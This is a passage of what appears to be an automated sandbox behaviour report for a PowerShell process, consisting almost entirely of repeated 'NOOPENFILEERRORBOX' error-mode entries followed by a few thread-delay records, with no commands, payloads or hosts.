                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3042Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6803Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3997Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2245Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6440Jump to behavior
